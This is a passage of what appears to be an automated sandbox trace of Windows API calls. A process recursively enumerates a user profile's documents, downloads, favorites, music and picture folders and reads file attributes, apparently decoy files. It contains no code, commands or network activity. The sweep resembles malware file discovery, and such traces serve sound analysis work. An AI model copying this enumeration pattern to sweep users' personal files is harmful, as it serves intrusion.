lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f6260a0, ftCreationTime.dwHighDateTime=0x1d3ab59, ftLastAccessTime.dwLowDateTime=0x4d2f8950, ftLastAccessTime.dwHighDateTime=0x1d3eb48, ftLastWriteTime.dwLowDateTime=0x4d2f8950, ftLastWriteTime.dwHighDateTime=0x1d3eb48, nFileSizeHigh=0x0, nFileSizeLow=0xb0c9)) returned 1 [0039.457] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\tIc5Z2V9Xl.pptx" (normalized: "c:\\users\\eebsym5\\documents\\tic5z2v9xl.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54cfc7b0, ftCreationTime.dwHighDateTime=0x1d3d7fc, ftLastAccessTime.dwLowDateTime=0xaa58c640, ftLastAccessTime.dwHighDateTime=0x1d3bd59, ftLastWriteTime.dwLowDateTime=0xaa58c640, ftLastWriteTime.dwHighDateTime=0x1d3bd59, nFileSizeHigh=0x0, nFileSizeLow=0x2ab4)) returned 1 [0039.457] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\VQ1gd7oiEKIkQ.docx" (normalized: "c:\\users\\eebsym5\\documents\\vq1gd7oiekikq.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff4b9500, ftCreationTime.dwHighDateTime=0x1d41c28, ftLastAccessTime.dwLowDateTime=0x571c48d0, ftLastAccessTime.dwHighDateTime=0x1d416ff, ftLastWriteTime.dwLowDateTime=0x571c48d0, ftLastWriteTime.dwHighDateTime=0x1d416ff, nFileSizeHigh=0x0, nFileSizeLow=0x10a14)) returned 1 [0039.457] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\VyTyj-R9XKxPoJL.docx" (normalized: "c:\\users\\eebsym5\\documents\\vytyj-r9xkxpojl.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fecff50, ftCreationTime.dwHighDateTime=0x1d3f61c, ftLastAccessTime.dwLowDateTime=0xf94534b0, ftLastAccessTime.dwHighDateTime=0x1d3eff3, ftLastWriteTime.dwLowDateTime=0xf94534b0, ftLastWriteTime.dwHighDateTime=0x1d3eff3, nFileSizeHigh=0x0, nFileSizeLow=0xb038)) returned 1 [0039.457] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\w93jUZej_fLnqMETz.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\w93juzej_flnqmetz.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2194f230, ftCreationTime.dwHighDateTime=0x1d3c627, ftLastAccessTime.dwLowDateTime=0xb1ff1e10, ftLastAccessTime.dwHighDateTime=0x1d42c41, ftLastWriteTime.dwLowDateTime=0xb1ff1e10, ftLastWriteTime.dwHighDateTime=0x1d42c41, nFileSizeHigh=0x0, nFileSizeLow=0x479a)) returned 1 [0039.458] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\yBSa8wX56GadPmdS.xls" (normalized: "c:\\users\\eebsym5\\documents\\ybsa8wx56gadpmds.xls"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96906910, ftCreationTime.dwHighDateTime=0x1d41c68, ftLastAccessTime.dwLowDateTime=0x4a5322a0, ftLastAccessTime.dwHighDateTime=0x1d41f64, ftLastWriteTime.dwLowDateTime=0x4a5322a0, ftLastWriteTime.dwHighDateTime=0x1d41f64, nFileSizeHigh=0x0, nFileSizeLow=0x156ce)) returned 1 [0039.458] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\ZQFPlLLJcG.ots" (normalized: "c:\\users\\eebsym5\\documents\\zqfpllljcg.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f82db60, ftCreationTime.dwHighDateTime=0x1d410c1, ftLastAccessTime.dwLowDateTime=0x337d9af0, ftLastAccessTime.dwHighDateTime=0x1d41d17, ftLastWriteTime.dwLowDateTime=0x337d9af0, ftLastWriteTime.dwHighDateTime=0x1d41d17, nFileSizeHigh=0x0, nFileSizeLow=0x13a7b)) returned 1 [0039.458] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\_Pd5ksq8IUStSyz0u.xls" (normalized: "c:\\users\\eebsym5\\documents\\_pd5ksq8iustsyz0u.xls"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1b98d30, ftCreationTime.dwHighDateTime=0x1d41165, ftLastAccessTime.dwLowDateTime=0x57d43050, ftLastAccessTime.dwHighDateTime=0x1d41e14, ftLastWriteTime.dwLowDateTime=0x57d43050, ftLastWriteTime.dwHighDateTime=0x1d41e14, nFileSizeHigh=0x0, nFileSizeLow=0x3142)) returned 1 [0039.458] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\documents\\_V3vWbuUxbGtebcXi5ye.pps" (normalized: "c:\\users\\eebsym5\\documents\\_v3vwbuuxbgtebcxi5ye.pps"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16e93e40, ftCreationTime.dwHighDateTime=0x1d415dc, ftLastAccessTime.dwLowDateTime=0x688d7db0, ftLastAccessTime.dwHighDateTime=0x1d419e7, ftLastWriteTime.dwLowDateTime=0x688d7db0, ftLastWriteTime.dwHighDateTime=0x1d419e7, nFileSizeHigh=0x0, nFileSizeLow=0x4618)) returned 1 [0039.458] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.458] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\downloads\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.459] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\downloads\\desktop.ini" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0039.459] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.459] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.459] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0039.459] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.459] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x78028160, ftLastWriteTime.dwHighDateTime=0x1d2f584, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0039.460] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cfe16b0, ftCreationTime.dwHighDateTime=0x1d2da19, ftLastAccessTime.dwLowDateTime=0x7cfe16b0, ftLastAccessTime.dwHighDateTime=0x1d2da19, ftLastWriteTime.dwLowDateTime=0x7d3737b0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xec)) returned 1 [0039.460] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd3a0830, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0039.461] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.461] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.481] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.482] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.483] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.483] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.483] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.484] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xd2e2150, ftLastWriteTime.dwHighDateTime=0x1d2da0e, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0039.484] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.484] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.484] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\links\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.484] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4a6ae0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0039.485] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.485] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\local settings\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.485] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.485] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\chyu9er\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.485] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.486] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\music\\desktop.ini" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec40e560, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.486] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.486] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\fgr69fjq\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37db50 [0039.486] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\fgr69fjq\\scisy\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37c730 [0039.487] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.487] FindClose (in: hFindFile=0x37db50 | out: hFindFile=0x37db50) returned 1 [0039.487] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\laktebxipnnuvby6\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37db50 [0039.487] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\laktebxipnnuvby6\\4sxuvmu_r\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37c730 [0039.488] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.488] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\laktebxipnnuvby6\\ux9ok9sai72\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37c730 [0039.488] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.488] FindClose (in: hFindFile=0x37db50 | out: hFindFile=0x37db50) returned 1 [0039.489] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\yodkdjnurpiu\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37db50 [0039.489] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\yodkdjnurpiu\\kyyv\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37c730 [0039.489] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\music\\t2xsyfhz\\yodkdjnurpiu\\kyyv\\ddj spkwmcrwlxfuc\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x3894d8 [0039.489] FindClose (in: hFindFile=0x3894d8 | out: hFindFile=0x3894d8) returned 1 [0039.490] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.490] FindClose (in: hFindFile=0x37db50 | out: hFindFile=0x37db50) returned 1 [0039.490] FindClose (in: hFindFile=0x37e3a0 | out: hFindFile=0x37e3a0) returned 1 [0039.490] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.490] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\my documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.491] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\nethood\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.491] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\NTUSER.DAT" (normalized: "c:\\users\\eebsym5\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x51cec710, ftLastAccessTime.dwHighDateTime=0x1d4201c, ftLastWriteTime.dwLowDateTime=0x51cec710, ftLastWriteTime.dwHighDateTime=0x1d4201c, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0039.491] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\ntuser.ini" (normalized: "c:\\users\\eebsym5\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x8e4c770, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e4c770, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0039.492] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.492] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\-11mX.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\-11mx.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83f1a7a0, ftCreationTime.dwHighDateTime=0x1d41d18, ftLastAccessTime.dwLowDateTime=0x27578600, ftLastAccessTime.dwHighDateTime=0x1d416eb, ftLastWriteTime.dwLowDateTime=0x27578600, ftLastWriteTime.dwHighDateTime=0x1d416eb, nFileSizeHigh=0x0, nFileSizeLow=0x2fbd)) returned 1 [0039.492] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\49th-XF.png" (normalized: "c:\\users\\eebsym5\\pictures\\49th-xf.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1b06450, ftCreationTime.dwHighDateTime=0x1d41c6e, ftLastAccessTime.dwLowDateTime=0xbb78c760, ftLastAccessTime.dwHighDateTime=0x1d41e87, ftLastWriteTime.dwLowDateTime=0xbb78c760, ftLastWriteTime.dwHighDateTime=0x1d41e87, nFileSizeHigh=0x0, nFileSizeLow=0x81ec)) returned 1 [0039.492] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\6ZJkVBSeo-K.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\6zjkvbseo-k.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a450f60, ftCreationTime.dwHighDateTime=0x1d4125f, ftLastAccessTime.dwLowDateTime=0x34257820, ftLastAccessTime.dwHighDateTime=0x1d412ad, ftLastWriteTime.dwLowDateTime=0x34257820, ftLastWriteTime.dwHighDateTime=0x1d412ad, nFileSizeHigh=0x0, nFileSizeLow=0x201b)) returned 1 [0039.493] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.493] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\A7YHcIpYi9.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\a7yhcipyi9.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4b78a70, ftCreationTime.dwHighDateTime=0x1d4122e, ftLastAccessTime.dwLowDateTime=0x5932140, ftLastAccessTime.dwHighDateTime=0x1d41930, ftLastWriteTime.dwLowDateTime=0x5932140, ftLastWriteTime.dwHighDateTime=0x1d41930, nFileSizeHigh=0x0, nFileSizeLow=0xe443)) returned 1 [0039.493] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\Ap9JCsd.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\ap9jcsd.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54422120, ftCreationTime.dwHighDateTime=0x1d412a9, ftLastAccessTime.dwLowDateTime=0x1fd46e10, ftLastAccessTime.dwHighDateTime=0x1d41a48, ftLastWriteTime.dwLowDateTime=0x1fd46e10, ftLastWriteTime.dwHighDateTime=0x1d41a48, nFileSizeHigh=0x0, nFileSizeLow=0x3f5e)) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\MRaActwrCBxT.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\mraactwrcbxt.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785b81a0, ftCreationTime.dwHighDateTime=0x1d41dc6, ftLastAccessTime.dwLowDateTime=0x2b415a70, ftLastAccessTime.dwHighDateTime=0x1d41948, ftLastWriteTime.dwLowDateTime=0x2b415a70, ftLastWriteTime.dwHighDateTime=0x1d41948, nFileSizeHigh=0x0, nFileSizeLow=0x25e6)) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\PizAD39aBNCV.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pizad39abncv.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964ed0d0, ftCreationTime.dwHighDateTime=0x1d41705, ftLastAccessTime.dwLowDateTime=0x128e0d00, ftLastAccessTime.dwHighDateTime=0x1d41cd8, ftLastWriteTime.dwLowDateTime=0x128e0d00, ftLastWriteTime.dwHighDateTime=0x1d41cd8, nFileSizeHigh=0x0, nFileSizeLow=0x96d2)) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\POfl3a-l.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pofl3a-l.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d236510, ftCreationTime.dwHighDateTime=0x1d41968, ftLastAccessTime.dwLowDateTime=0x4bb4c000, ftLastAccessTime.dwHighDateTime=0x1d41a36, ftLastWriteTime.dwLowDateTime=0x4bb4c000, ftLastWriteTime.dwHighDateTime=0x1d41a36, nFileSizeHigh=0x0, nFileSizeLow=0x15367)) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rD7TFDs4mV8cDgM.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rd7tfds4mv8cdgm.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8a5cf0, ftCreationTime.dwHighDateTime=0x1d41f3b, ftLastAccessTime.dwLowDateTime=0xec4be460, ftLastAccessTime.dwHighDateTime=0x1d41c13, ftLastWriteTime.dwLowDateTime=0xec4be460, ftLastWriteTime.dwHighDateTime=0x1d41c13, nFileSizeHigh=0x0, nFileSizeLow=0x1e57)) returned 1 [0039.494] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\X6Y7yPEXZvVxK8gGc.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\x6y7ypexzvvxk8ggc.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ed6390, ftCreationTime.dwHighDateTime=0x1d41804, ftLastAccessTime.dwLowDateTime=0x3efa54d0, ftLastAccessTime.dwHighDateTime=0x1d417f0, ftLastWriteTime.dwLowDateTime=0x3efa54d0, ftLastWriteTime.dwHighDateTime=0x1d417f0, nFileSizeHigh=0x0, nFileSizeLow=0xaa27)) returned 1 [0039.495] 